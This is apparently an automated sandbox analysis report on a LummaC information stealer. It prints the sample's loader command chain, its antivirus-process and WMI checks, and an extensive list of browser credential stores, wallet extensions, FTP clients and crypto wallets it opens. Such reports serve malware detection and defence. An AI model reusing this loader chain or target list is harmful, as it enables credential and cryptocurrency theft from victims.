Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 826825	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Mods.vob	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Previously" Mean	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob g	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\826825\Motion.com Motion.com g	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: Motion.com, 00000011.00000000.1318050728.0000000000613000.00000002.00000001.01000000.00000007.sdmp, Defend.13.dr, Motion.com.5.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_00405C44 GlobalAlloc,lstrlenW,GetVersionExW,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GlobalFree,lstrcpyW,OpenProcess,CloseHandle,CharUpperW,lstrcmpW,GlobalFree,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,lstrcmpW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,

0_2_00405C44

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.24.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.24.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.24.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.24.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
